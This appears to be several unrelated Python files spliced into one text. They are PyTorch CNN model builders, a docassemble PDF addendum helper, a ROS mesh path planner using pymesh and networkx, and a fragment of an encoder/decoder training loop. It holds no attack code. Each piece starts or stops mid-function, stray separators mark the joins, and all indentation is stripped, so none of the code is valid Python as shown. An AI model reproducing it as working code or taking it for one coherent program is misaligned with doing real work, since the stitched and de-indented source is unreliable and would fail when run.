nn.Conv2d(3, 16, 4, stride=2, padding=1),
nn.ReLU(),
nn.Conv2d(16, 32, 4, stride=2, padding=1),
nn.ReLU(),
Flatten(),
nn.Linear(32*8*8,100),
nn.ReLU(),
nn.Linear(100, 10)
)
for m in model.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
m.bias.data.zero_()
return model
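# Shape check (illustrative): a 3x32x32 CIFAR-10 image -> 16x16x16 -> 32x8x8 -> Flatten -> 2048,
# matching nn.Linear(32*8*8, 100) above. The loop over modules applies He/Kaiming-style initialisation
# to the conv layers: std = sqrt(2 / (k_h * k_w * out_channels)), zero bias.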
def cifar_model_large():
model = nn.Sequential(
nn.Conv2d(3, 32, 3, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(32, 32, 4, stride=2, padding=1),
nn.ReLU(),
nn.Conv2d(32, 64, 3, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(64, 64, 4, stride=2, padding=1),
nn.ReLU(),
Flatten(),
nn.Linear(64*8*8,512),
nn.ReLU(),
nn.Linear(512,512),
nn.ReLU(),
nn.Linear(512,10)
)
for m in model.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
m.bias.data.zero_()
return model
def model_cnn_4layer(in_ch, in_dim, width, linear_size):
model = nn.Sequential(
nn.Conv2d(in_ch, 4*width, 3, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(4*width, 4*width, 4, stride=2, padding=1),
nn.ReLU(),
nn.Conv2d(4*width, 8*width, 3, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(8*width, 8*width, 4, stride=2, padding=1),
nn.ReLU(),
Flatten(),
nn.Linear(8*width*(in_dim // 4)*(in_dim // 4),linear_size),
nn.ReLU(),
nn.Linear(linear_size,linear_size),
nn.ReLU(),
nn.Linear(linear_size,10)
)
for m in model.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
m.bias.data.zero_()
return model
def model_cnn_4layer_noinit(in_ch, in_dim, width, linear_size):
model = nn.Sequential(
nn.Conv2d(in_ch, 4*width, 3, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(4*width, 4*width, 4, stride=2, padding=1),
nn.ReLU(),
nn.Conv2d(4*width, 8*width, 3, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(8*width, 8*width, 4, stride=2, padding=1),
nn.ReLU(),
Flatten(),
nn.Linear(8*width*(in_dim // 4)*(in_dim // 4),linear_size),
nn.ReLU(),
nn.Linear(linear_size,linear_size),
nn.ReLU(),
nn.Linear(linear_size,10)
)
# for m in model.modules():
# if isinstance(m, nn.Conv2d):
# n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
# m.weight.data.normal_(0, math.sqrt(2. / n))
# m.bias.data.zero_()
return model
def cifar_model_M():
model = nn.Sequential(
nn.Conv2d(3, 32, 3, stride=1),
nn.ReLU(),
nn.Conv2d(32, 32, 4, stride=2),
nn.ReLU(),
nn.Conv2d(32, 64, 3, stride=1),
nn.ReLU(),
nn.Conv2d(64, 64, 4, stride=2),
nn.ReLU(),
Flatten(),
nn.Linear(64*8*8,512),
nn.ReLU(),
nn.Linear(512,512),
nn.ReLU(),
nn.Linear(512,10)
)
for m in model.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
m.bias.data.zero_()
return model
def c5f2():
model = nn.Sequential(
nn.Conv2d(3, 64, 3, stride=1),
nn.ReLU(),
nn.Conv2d(64, 64, 3, stride=2),
nn.ReLU(),
nn.Conv2d(64, 128, 3, stride=1),
nn.ReLU(),
nn.Conv2d(128, 128, 3, stride=2),
nn.ReLU(),
nn.Conv2d(128, 128, 3, stride=2),
nn.ReLU(),
Flatten(),
nn.Linear(512,512),
nn.ReLU(),
nn.Linear(512,10)
)
for m in model.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
m.bias.data.zero_()
return model
# def c6f2():
# model = nn.Sequential(
# nn.Conv2d(3, 32, 3, stride=1, padding=1),
# nn.ReLU(),
# nn.Conv2d(32, 32, 3, stride=1, padding=1),
# nn.ReLU(),
# nn.Conv2d(32, 32, 4, stride=2, padding=1),
# nn.ReLU(),
# nn.Conv2d(32, 64, 3, stride=1, padding=1),
# nn.ReLU(),
# nn.Conv2d(64, 64, 3, stride=1, padding=1),
# nn.ReLU(),
# nn.Conv2d(64, 64, 4, stride=2),
# nn.ReLU(),
# Flatten(),
# nn.Linear(3136,512),
# nn.ReLU(),
# nn.Linear(512,10)
# )
# for m in model.modules():
# if isinstance(m, nn.Conv2d):
# n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
# m.weight.data.normal_(0, math.sqrt(2. / n))
# m.bias.data.zero_()
# return model
def c6f2_():
model = nn.Sequential(
nn.Conv2d(3, 32, 3, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(32, 32, 3, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(32, 32, 4, stride=2, padding=1),
nn.ReLU(),
nn.Conv2d(32, 64, 3, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(64, 64, 3, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(64, 64, 4, stride=2, padding=1),
nn.ReLU(),
Flatten(),
nn.Linear(4096,512),
nn.ReLU(),
nn.Linear(512,10)
)
for m in model.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
m.bias.data.zero_()
return model
def tinyimagenet():
model = nn.Sequential(
nn.Conv2d(3, 64, 3, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(64, 64, 3, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(64, 64, 4, stride=2),
nn.ReLU(),
nn.Conv2d(64, 128, 3, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(128, 128, 3, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(128, 128, 4, stride=2),
nn.ReLU(),
nn.Conv2d(128, 256, 3, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(256, 256, 4, stride=2),
nn.ReLU(),
Flatten(),
nn.Linear(9216,256),
nn.ReLU(),
nn.Linear(256,200)
)
for m in model.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
m.bias.data.zero_()
return model
############################## Flatten / one_hot
class Flatten(nn.Module): ## =nn.Flatten()
def forward(self, x):
return x.view(x.size()[0], -1)
def one_hot(batch,depth=10):
ones = torch.eye(depth).cuda()
return ones.index_select(0,batch)
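# Example (illustrative): one_hot(torch.tensor([2, 0]).cuda(), depth=4) selects rows of a 4x4 identity,
# giving [[0, 0, 1, 0], [1, 0, 0, 0]] as float tensors on the GPU.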
##############################
def train(loader, model, | |
<gh_stars>0
from docassemble.base.util import log, word, DADict, DAList, DAObject, DAFile, DAFileCollection, DAFileList, defined, value, pdf_concatenate, DAOrderedDict, action_button_html, include_docx_template
import re
def label(dictionary):
try:
return list(dictionary.items())[0][1]
except:
return ''
def key(dictionary):
try:
return list(dictionary.items())[0][0]
except:
return ''
def safeattr(object, key):
try:
if isinstance(object, dict) or isinstance(object, DADict):
return str(object.get(key,''))
elif isinstance(object, DAObject):
return str(getattr(object, key))
else:
return ''
except:
return ""
def html_safe_str( the_string ):
"""
Return a string that can be used as an html class or id
"""
return re.sub( r'[^A-Za-z0-9]+', '_', the_string )
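# Example (illustrative): html_safe_str("Cover letter (final).pdf") -> "Cover_letter_final_pdf"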
def table_row( obj, key='final' ):
"""
Return a string of html that is one row of a table containing
the `.as_pdf()` contents of an AL object and its interaction buttons
"""
pdf = obj.as_pdf(key=key)
html = '\n\t<tr>'
html += '\n\t\t<td><i class="fas fa-file"></i> </td>'
html += '\n\t\t<td>' + obj.title + ' </td>'
html += '\n\t\t<td>'
html += action_button_html( pdf.url_for(), label=word("View"), icon="eye", color="secondary" )
html += ' </td>'
html += '\n\t\t<td>'
html += action_button_html( pdf.url_for(attachment=True), label=word("Download"), icon="download", color="primary" )
html += '</td>'
html += '\n\t</tr>'
return html
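# Illustrative result (assumed an object with .title and .as_pdf()): a single <tr> containing a file
# icon, the document title, a "View" action button linking to the rendered PDF, and a "Download" button.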
class ALAddendumField(DAObject):
"""
Object representing a single field and its attributes as related to whether
it should be displayed in an addendum. Useful for PDF templates.
The items can be strings or lists/list-like objects. It does not know
how to handle overflow for a dictionary.
Required attributes:
- field_name->str represents the name of a docassemble variable
- overflow_trigger->int
Optional/planned (not implemented yet):
- headers->dict(attribute: display label for table)
- field_style->"list"|"table"|"string" (optional: defaults to "string")
"""
def init(self, *pargs, **kwargs):
super(ALAddendumField, self).init(*pargs, **kwargs)
def overflow_value(self, preserve_newlines=False, input_width=80, overflow_message = ""):
"""
Try to return just the portion of the variable (list-like object or string)
that exceeds the overflow trigger. Otherwise, return empty string.
If newlines are preserved, we will use a heuristic to estimate line breaks instead
of using an absolute character limit.
"""
last_char = max(len(self.safe_value(overflow_message = overflow_message, input_width=input_width, preserve_newlines=True)) - (max(len(overflow_message)-1,0)), 0)
if preserve_newlines and isinstance(self.value_if_defined(),str):
# start where the safe value ends
return self.value_if_defined()[last_char:]
if isinstance(self.value_if_defined(),str):
return self.value_if_defined()[last_char:]
return self.value_if_defined()[self.overflow_trigger:]
def max_lines(self, input_width=80, overflow_message_length=0):
"""
Estimate the number of rows in the field in the output document.
"""
return int(max(self.overflow_trigger-overflow_message_length,0) / input_width) + 1
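# Worked example (illustrative): overflow_trigger=240, input_width=80, overflow_message_length=20
# -> int(max(240 - 20, 0) / 80) + 1 = int(2.75) + 1 = 3 estimated lines.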
def value(self):
"""
Return the full value, disregarding overflow. Could be useful in the addendum
if you want to show the whole value without making the user flip back and forth
between multiple pages.
"""
return self.value_if_defined()
def safe_value(self, overflow_message = "", input_width=80, preserve_newlines=False):
"""
Try to return just the portion of the variable
that is _shorter than_ the overflow trigger. Otherwise, return empty string.
"""
# Handle simplest case first
value = self.value_if_defined()
if isinstance(value, str) and len(value) <= self.overflow_trigger and (value.count('\r') + value.count('\n')) == 0:
return value
max_lines = self.max_lines(input_width=input_width,overflow_message_length=len(overflow_message))
max_chars = max(self.overflow_trigger - len(overflow_message),0)
# If there are at least 2 lines, we can ignore overflow trigger.
# each line will be at least input_width wide
if preserve_newlines and max_lines > 1:
if isinstance(value, str):
# Replace all new line characters with just \n. \r\n inserts two lines in a PDF
value = re.sub(r"[\r\n]+|\r+|\n+",r"\n",value).rstrip()
line = 1
retval = ""
paras = value.split('\n')
para = 0
while line <= max_lines and para < len(paras):
# add the whole paragraph if less than width of input
if len(paras[para]) <= input_width:
retval += paras[para] + "\n"
line += 1
para += 1
else:
# Keep taking the first input_width characters until we hit max_lines
# or we finish the paragraph
while line <= max_lines and len(paras[para]):
retval += paras[para][:input_width]
paras[para] = paras[para][input_width:]
line += 1
if not len(paras[para]):
para += 1
retval += "\n"
# TODO: check logic here to only add overflow message when we exceed length
if len(paras) > para:
return retval.rstrip() + overflow_message # remove trailing newline before adding overflow message
else:
return retval
# Strip newlines from strings
if isinstance(value, str):
if len(value) > self.overflow_trigger:
return re.sub(r"[\r\n]+|\r+|\n+"," ",value).rstrip()[:max_chars] + overflow_message
else:
return re.sub(r"[\r\n]+|\r+|\n+"," ",value).rstrip()[:max_chars]
# If the overflow item is a list or DAList
if isinstance(value, list) or isinstance(value, DAList):
return value[:self.overflow_trigger]
else:
# We can't slice objects that are not lists or strings
return value
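# Worked example (illustrative, assumed field): with overflow_trigger=10 and the value
# "The quick brown fox" (no newlines), safe_value() returns "The quick " (the first 10 characters)
# and overflow_value() returns the remainder, "brown fox".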
def value_if_defined(self):
"""
Return the value of the field if it is defined, otherwise return an empty string.
Addendum should never trigger docassemble's variable gathering.
"""
if defined(self.field_name):
return value(self.field_name)
return ""
def __str__(self):
return str(self.value_if_defined())
def columns(self):
"""
Return a list of the columns in this object.
"""
if hasattr(self, 'headers'):
return self.headers
else:
# Use the first row as an exemplar
try:
first_value = self.value_if_defined()[0]
if isinstance(first_value, dict) or isinstance(first_value, DADict):
return list([{key:key} for key in first_value.keys()])
elif isinstance(first_value, DAObject):
attr_to_ignore = {'has_nonrandom_instance_name','instanceName','attrList'}
return [{key:key} for key in list( set(first_value.__dict__.keys()) - attr_to_ignore )]
except:
return None
# None means the value has no meaningful columns we can extract
def type(self):
"""
list | object_list | other
"""
value = self.value_if_defined()
if isinstance(value, list) or isinstance(value, DAList):
if len(value) and (isinstance(value[0], dict) or isinstance(value[0], DADict) or isinstance(value[0], DAObject)):
return "object_list"
return "list"
return "other"
def is_list(self):
"""
Identify whether the field is a list, whether of objects/dictionaries or just plain variables.
"""
return self.type() == 'object_list' or self.type() == 'list'
def is_object_list(self):
"""
Identify whether the field represents a list of either dictionaries or objects.
"""
return self.type() == 'object_list'
def overflow_markdown(self):
"""
Return a formatted markdown table or bulleted list representing the values in the list.
This method does not give you any control over the output other than labels of columns,
but you also do not need to use this output if you want to independently control the format
of the table.
"""
if not self.columns():
if self.overflow_value():
retval = "* "
retval += "\n* ".join(self.overflow_value())
return retval + "\n"
else:
return ""
num_columns = len(self.columns())
header = " | ".join([list(item.items())[0][1] for item in self.columns()])
header += "\n"
header += "|".join(["-----"] * num_columns)
flattened_columns = []
for column in self.columns():
flattened_columns.append(list(column.items())[0][0])
rows = "\n"
for row in self.overflow_value():
if isinstance(row, dict) or isinstance(row, DADict):
row_values = []
for column in flattened_columns:
row_values.append(str(row.get(column,'')))
rows += "|".join(row_values)
else:
row_values = []
for column in flattened_columns:
# don't trigger collecting attributes that are required to resolve
# to a string
try:
row_values.append(str(getattr(row, column,'')))
except:
row_values.append("")
rows += "|".join(row_values)
rows += "\n"
return header + rows
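# Illustrative output (assumed headers [{'name': 'Name'}, {'age': 'Age'}] and overflow rows of dicts):
#   Name | Age
#   -----|-----
#   Alice|34
#   Bob|41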
def overflow_docx(self, path="docassemble.ALDocumentDict:data/templates/addendum_table.docx"):
"""
Light wrapper around include_docx_template() that inserts a formatted table into a docx
file. If the object in the list is a plain string/int, it returns a bulleted list.
Using this method will not give you any control at all over the formatting, but you can directly
call field.overflow_value() instead of using this method.
"""
return include_docx_template(path, columns=self.columns(), rows=self.overflow_value())
class ALAddendumFieldDict(DAOrderedDict):
"""
Object representing a list of fields in your output document, together
with the character limit for each field.
Provides convenient methods to determine if an addendum is needed and to
control the display of fields so the appropriate text (overflow or safe amount)
is displayed in each context.
Adding a new entry will implicitly set the `field_name` attribute of the field.
optional:
- style: if set to "overflow_only" will only display the overflow text
"""
def init(self, *pargs, **kwargs):
super(ALAddendumFieldDict, self).init(*pargs, **kwargs)
self.object_type = ALAddendumField
self.auto_gather=False
if not hasattr(self, 'style'):
self.style = 'overflow_only'
if hasattr(self, 'data'):
self.from_list(self.data)
del self.data
def initializeObject(self, *pargs, **kwargs):
"""
When we create a new entry implicitly, make sure we also set the .field_name
attribute to the key name so it knows its own field_name.
"""
the_key = pargs[0]
super().initializeObject(*pargs, **kwargs)
self[the_key].field_name = the_key
def from_list(self, data):
for entry in data:
new_field = self.initializeObject(entry['field_name'], ALAddendumField)
new_field.field_name | |
#!/usr/bin/env python
import rospy
import pymesh
import networkx as nx
import multiprocessing
import graph_search
import numpy as np
import time
from scipy import spatial
import mesh_helper
from sklearn.cluster import DBSCAN
import traceback
import pybullet_angle_estimation
import optimization_angle_estimation
class MeshPlannerBase:
"""
Mesh path finder: given a mesh, a list of metrics, and source and destination points,
it calculates the optimal paths.
"""
def __init__(self, mesh_path, graph_metrics_types):
"""
Mesh Path Finder constructor
:param mesh_path: path to mesh .stl file
:param graph_metrics_types: list of graph metrics types to calculate (GraphMetricType enum object)
"""
self.mesh_path = mesh_path
self.mesh = pymesh.load_mesh(self.mesh_path)
if isinstance(graph_metrics_types, (list, tuple)):
self.graph_metrics_types = graph_metrics_types
elif graph_metrics_types is not None:
self.graph_metrics_types = [graph_metrics_types]
else:
raise TypeError("graph_metrics is not a valid object type [list, tuple]")
self.pybullet_angle_client = pybullet_angle_estimation.PybulletAngleEstimation(mesh_path)
self.optimization_angle_client = optimization_angle_estimation.OptimizationAngleEstimation(mesh_path)
# REAL ROBOT CONSTANTS
# self.transversality_threshold = 40 # REAL ROBOT
# self.border_threshold = 0.4 # REAL ROBOT
# SIMULATED ROBOT CONSTANTS
self.transversality_threshold = 30 # max inclination (in degrees) the robot could climb
self.bumpiness_threshold = 0.5 # maximum bump the robot could jump between surfaces TODO add reference here
self.border_threshold = 0.3 # distance to expand from borders to other face centroids
# self.shortest_comb_weight = 0.80
# self.energy_comb_weight = 0.10
# self.transversality_comb_weight = 0.10
self.shortest_comb_weight = 0.25 # weight of the shortest-path metric when combining metrics
self.energy_comb_weight = 0.25 # weight of the energy metric when combining metrics
self.transversality_comb_weight = 0.50 # weight of the transversality metric when combining metrics
self.mesh.enable_connectivity() # enables connectivity on mesh
self.mesh.add_attribute("face_centroid") # adds the face centroids to be accessed
self.mesh.add_attribute("face_normal") # adds the face normals to be accessed
self.faces = self.mesh.faces
self.centroids = self.mesh.get_face_attribute("face_centroid")
self.normals = self.mesh.get_face_attribute("face_normal")
self.mesh_frontiers = set()
rospy.loginfo("Vertex and Face count: %d, %d" % (self.mesh.num_vertices, self.mesh.num_faces))
rospy.loginfo("Dimensions and Vertexes in a face: %d, %d" % (self.mesh.dim, self.mesh.vertex_per_face))
def plot_graph_3d(self, G, title=None, source_id=None, target_id=None, border_3d_points=None,
reachable_frontiers_ids=None, frontier_centroids_ids=None, frontier_visit_ids=None):
"""Plot the 3D graph using Mayavi (useful for debugging)
:param G: the NetworkX graph
:param title: window title
:param source_id: source node id
:param target_id: target node id
:param border_3d_points: mesh borders points
:param reachable_frontiers_ids: frontier node ids
:param frontier_centroids_ids: frontier centroids ids
:param frontier_visit_ids: the visit point for the frontiers (generally is the closest point to the robot)
:return:
"""
from mayavi import mlab
if not title:
title = 1
mlab.figure(title, bgcolor=(0, 0, 0))
mlab.clf()
g_centroids = [tuple(self.centroids[v]) for v in sorted(G.nodes())]
centroid_gcon_dict = {v: int(i) for i, v in enumerate(g_centroids)}
xyz = np.array(g_centroids)
scalars = xyz[:, 2]
pts = mlab.points3d(xyz[:, 0], xyz[:, 1], xyz[:, 2],
scalars,
scale_factor=0.1,
scale_mode='none',
colormap='Blues',
resolution=20)
edge_list = []
for e in G.edges():
e1 = tuple(self.centroids[e[0]])
e2 = tuple(self.centroids[e[1]])
edge_list.append([centroid_gcon_dict[e1], centroid_gcon_dict[e2]])
edge_list = np.array(edge_list)
pts.mlab_source.dataset.lines = np.array(edge_list)
# lines = mlab.pipeline.stripper(pts)
mlab.pipeline.surface(pts, color=(0.2, 0.4, 0.5), line_width=1, opacity=.4)
if border_3d_points and len(border_3d_points) > 0:
xyz_d2 = np.array(border_3d_points)
scalars_d2 = np.ones(xyz_d2.shape[0])
mlab.points3d(xyz_d2[:, 0], xyz_d2[:, 1], xyz_d2[:, 2], scalars_d2,
scale_factor=0.1,
scale_mode='none',
color=(1.0, 0.0, 0.0),
resolution=20)
# add source and target labels
if source_id:
src_3d = self.centroids[source_id]
mlab.text(src_3d[0], src_3d[1], "source", z=src_3d[2], width=0.2)
mlab.points3d([src_3d[0]], [src_3d[1]], [src_3d[2]],
scale_factor=0.25,
scale_mode='none',
color=(0, 1.0, 0.1),
resolution=20)
if target_id:
tgt_3d = self.centroids[target_id]
mlab.text(tgt_3d[0], tgt_3d[1], "target", z=tgt_3d[2], width=0.2)
mlab.points3d([tgt_3d[0]], [tgt_3d[1]], [tgt_3d[2]],
scale_factor=0.25,
scale_mode='none',
color=(0, 0.1, 1.0),
resolution=20)
if reachable_frontiers_ids and len(reachable_frontiers_ids) > 0:
frontiers_3dp = [tuple(self.centroids[v]) for v in reachable_frontiers_ids]
xyz = np.array(frontiers_3dp)
mlab.points3d(xyz[:, 0], xyz[:, 1], xyz[:, 2],
scale_factor=0.15,
scale_mode='none',
color=(1.0, 0.1, 1.0),
resolution=20)
if frontier_centroids_ids and len(frontier_centroids_ids) > 0:
centroids_3dp = [tuple(self.centroids[v]) for v in frontier_centroids_ids]
xyz = np.array(centroids_3dp)
mlab.points3d(xyz[:, 0], xyz[:, 1], xyz[:, 2],
scale_factor=0.35,
scale_mode='none',
color=(1.0, 0.1, 1.0),
resolution=20)
if frontier_visit_ids and len(frontier_visit_ids) > 0:
centroids_3dp = [tuple(self.centroids[v]) for v in frontier_visit_ids]
xyz = np.array(centroids_3dp)
mlab.points3d(xyz[:, 0], xyz[:, 1], xyz[:, 2],
scale_factor=0.35,
scale_mode='none',
color=(1.0, 0.1, 1.0),
resolution=20)
mlab.show()
def extract_frontiers_from_mesh(self):
"""Extract the face frontiers directly from the mesh file
:return: a set with the ids of the frontier faces
"""
for face_id in range(0, self.mesh.num_faces):
adj_faces = self.mesh.get_face_adjacent_faces(face_id)
if len(adj_faces) <= 2:
self.mesh_frontiers.add(face_id)
return self.mesh_frontiers
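# (added note) in a closed triangle mesh every face has 3 edge-adjacent faces, so a face reporting
# 2 or fewer adjacent faces lies on an open boundary of the mesh and is recorded as a frontier.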
def create_graph_from_mesh(self):
"""Create a graph from the mesh's faces centroids conecting nodes using the conectivity graph of the
original mesh
:return: a networkx graph G
"""
G = nx.Graph()
for face_idx in xrange(self.mesh.num_faces):
G.add_node(face_idx)
# add edges for adjacent faces
for face_idx in list(G.nodes()):
face_vertexes = self.mesh.faces[face_idx]
for v in face_vertexes:
vertex_adj_faces = self.mesh.get_vertex_adjacent_faces(v)
for face_adjacent in vertex_adj_faces:
if face_adjacent != face_idx and G.has_node(face_adjacent):
G.add_edge(face_idx, face_adjacent, weight=1)
return G
def prepare_graph(self, G, source_id, target_id=None):
"""Filter and extract frontiers given a mesh graph. Remove outliers, join nearby traversable surfaces,
perform a border expansion to prevent collisions, etc.
:param G:
:param source_id: source node id
:param target_id: target node id
:return: G, f_visit_ids, f_centroids_ids, filtered_reachable_f_ids
"""
print "G size:", len(G.nodes)
G = self.filter_graph_by_traversable_faces(G)
print "G size:", len(G.nodes)
G = self.remove_non_connected_components(G, source_id)
mesh_frontiers = self.extract_frontiers_from_mesh()
graph_frontiers = self.extract_borders_from_graph(G, degree_tresh=12)
reachable_frontiers = mesh_frontiers.intersection(graph_frontiers)
G = self.expand_graph_borders(G)
# add important nodes that could be lost in previous filtering steps
checked_nodes = list(reachable_frontiers)
unchecked_nodes = [source_id]
if target_id:
unchecked_nodes.append(target_id)
G, reachable_frontiers = self.reconnect_non_removable_nodes(G,
checked_nodes,
unchecked_nodes=unchecked_nodes,
max_distance=self.border_threshold + 1.0)
G = self.remove_non_connected_components(G, source_id)
filtered_reachable_f_ids = reachable_frontiers.intersection(G.nodes())
f_centroids_ids = []
f_visit_ids = []
if len(filtered_reachable_f_ids) > 0:
f_visit_ids, f_centroids_ids, f_centroids, f_points = self.cluster_frontier_borders(G,
filtered_reachable_f_ids,
source_id)
return G, f_visit_ids, f_centroids_ids, filtered_reachable_f_ids
def extract_borders_from_graph(self, G, degree_tresh=9):
"""Extract the nodes that has a degree less than two, this is a heuristic to detect which nodes
are located at the edges of the graph (such as obstacle borders and map border limits)
:param G:
:param degree_tresh: all nodes with degree less than degree_tresh are considered as border
:return: list of border node indices
"""
border_nodes = []
for v in sorted(G.nodes()):
if nx.degree(G, v) <= degree_tresh:
border_nodes.append(v)
return border_nodes
def filter_graph_by_traversable_faces(self, G):
"""Remove non traversable faces from the graph
CAUTION: this can return a non fully connected graph with multiple
smaller subgraphs
:param G:
:return: a graph with only traversable faces
"""
for face_idx in list(G.nodes()):
face_inclination = graph_search.MeshGraphSearch.calculate_traversal_angle(self.normals[face_idx])
if face_inclination > self.transversality_threshold:
G.remove_node(face_idx)
return G
def expand_graph_borders(self, G):
"""Remove nodes from a graph that are withing a distance treshold from the borders
this helps to generate routes where the robot could actually move (narrow passages) and prevent
collisions with obstacles and "static falls"
:param G:
:return: a smaller graph G' with the expanded borders removed
"""
# estimate borders of the remainder graph
border_centroids = []
for v in sorted(G.nodes()):
if nx.degree(G, v) <= 9:
border_centroids.append(tuple(self.centroids[v])) # tuples are hashable! lists are not
# remove nodes from graph that are near to the borders
# given a distance threshold
border_kdtree = spatial.KDTree(border_centroids)
for v in list(G.nodes()):
point = self.centroids[v]
distances, nearest_idx = border_kdtree.query([point])
obstacle_d = distances[0]
if obstacle_d <= self.border_threshold:
G.remove_node(v)
# remove small connected components
for component in list(nx.connected_components(G)):
if len(component) < 3:
for node in component:
G.remove_node(node)
return G
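# Minimal standalone sketch of the border-expansion idea (illustrative, not tied to pymesh/networkx):
# drop every centroid that lies within a threshold of any border centroid using a KD-tree query.
#   import numpy as np
#   from scipy import spatial
#   centroids = np.array([[0.0, 0.0], [1.0, 0.0], [5.0, 5.0]])
#   borders = np.array([[0.0, 0.1]])
#   dists, _ = spatial.KDTree(borders).query(centroids)
#   kept = centroids[dists > 0.3]   # [[1, 0], [5, 5]] survive; [0, 0] is too close to a border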
@staticmethod
def remove_non_connected_components(G, source):
"""Remove all unconnected components not connected to the source node (position of the robot)
:param G:
:param source:
:return: smaller G with the non connected components removed
"""
try:
conn_nodes = nx.node_connected_component(G, source)
return G.subgraph(conn_nodes).copy()
except Exception as e:
traceback.print_exc()
rospy.logerr('Error returning connected components %s', e.message)
return G
def reconnect_non_removable_nodes(self, G, checked_nodes, unchecked_nodes=None, max_distance=0.1):
"""Add non removable nodes to the graph which can be deleted by
previous filtering algorithms such as the source and destination points
The checked_nodes list will be added to the graph after validation for a maximum distance established by the
max_distance parameter. The unchecked_nodes will be added without previous validation, usefull for the start
and end nodes.
:param G: graph object
:param checked_nodes: nodes to check against a maximum distance threshold
:param unchecked_nodes:
:param max_distance:
:return: G with important nodes and edges added to it and nearest_checked_nodes, a list of the nearest
checked nodes
"""
nearest_checked_nodes = set()
if not unchecked_nodes:
unchecked_nodes = []
# check if the source, the target, and the frontiers are reachable
borderless_g_centroids = [tuple(self.centroids[v]) for v in sorted(G.nodes())]
assert | |
print("output_dim: ", str(output_dim))
# Train the autoencoder
if self.encoder.use_autoencoder:
self.encoder.autoencoder.fit(X)
start_epoch = 0
# Check for model checkpoint
checkpoint_file = os.path.join(self.checkpoint_dir, 'checkpoint.pth')
if os.path.exists(checkpoint_file):
check = torch.load(checkpoint_file)
self.encoder.load_state_dict(check['encoder'])
self.decoder.load_state_dict(check['decoder'])
encoder_optimizer.load_state_dict(check['encoder_optimizer'])
decoder_optimizer.load_state_dict(check['decoder_optimizer'])
loss = check['loss']
start_epoch = check['epoch'] + 1
print('loading from checkpoint, restarting at epoch', start_epoch)
# Train the model
for epoch in range(start_epoch, num_epochs):
print("epoch", str(epoch))
i = 0
while (i < num_examples):
batchXnp = X[i]
batchYnp = Y[i]
#if debug: print("batchX len:", str(len(batchXnp)), "batchY len:", str(len(batchYnp)))
if type(batchYnp) is list:
batchYnp = numpy.asarray(batchYnp)
batchYnp = batchYnp.astype('float64')
batchY = torch.tensor(batchYnp, dtype=torch.float64, device=tdevice, requires_grad=True)
#print("batchX size:", str(batchX.size()), "batchY size:", str(batchY.size()))
#if debug: print("batchX[0]:", str(batchXnp[0]))
#if debug: print("batchY size:", str(batchY.size()))
labels = batchY.view(1, -1, output_dim)
seq_length = labels.size(1)
#input_length = self.encoder.read_cycles
#if debug: print("seq_length:", str(seq_length))
encoder_optimizer.zero_grad()
decoder_optimizer.zero_grad()
#group_optimizer.zero_grad()
loss = 0
if len(batchXnp) > 0:
# Run the encoder
mem_block, encoder_hidden = self.encoder(batchXnp)
# Run the decoder
decoder_hidden = encoder_hidden
#print('decoder hidden:', decoder_hidden.size())
use_teacher_forcing = True if random.random() < teacher_forcing_ratio else False
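# (added note) teacher forcing: with probability teacher_forcing_ratio the decoder is fed the
# ground-truth selection (x_correct below) instead of its own previous pick, which tends to
# stabilise early training of pointer-style decoders.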
# Initialize the prediction
x_i = torch.zeros(hidden_size, dtype=torch.float64, device=tdevice)
output_indices = []
output_probs = []
correct_ranks = labels.squeeze()
flatten = False
#if self.group_thresh is not None:
# flatten = False
correct_indices = ranks_to_indices(correct_ranks.tolist(), flatten)
# INVERT the ranks?
if self.invert_ranks:
correct_indices.reverse()
num_timesteps = len(correct_indices)
print('num timesteps:', num_timesteps)
#if i==0: print('correct_indices:', correct_indices)
done_mask = torch.ones(seq_length, dtype=torch.float64, device=tdevice)
current_rank = []
x_list = []
# Run until we've picked all the items
#di = 0
#while torch.max(done_mask).item() > 0.0:
output_probs = []
target_probs = []
for di in range(num_timesteps):
print('di:', di)
index, decoder_hidden, done_mask, log_probs = self.decoder(x_i.view(1, -1), decoder_hidden, mem_block, done_mask, train=True)
#print('di:', di, 'mask:', done_mask)
output_probs.append(log_probs)
#output_probs.append(output_matrix.view(1, -1, 2))
# Select multiple items at each timestep
index = int(index.item())
x_i = mem_block[index]
# Teacher forcing for training
if use_teacher_forcing:
x_correct = mem_block[correct_indices[di]]
x_i = x_correct
for ei in correct_indices[di]:
done_mask[ei] = float('-inf')
'''
else:
x_i_list = []
for ei in range(seq_length):
print('output:', ei, output_matrix[ei])
ei_guess = torch.argmax(output_matrix[ei]) # See if 0 (yes) or 1 (no) was predicted
if ei_guess == 1:
print('choosing', ei)
done_mask[ei] = float('-inf')
x_i_list.append(mem_block[ei])
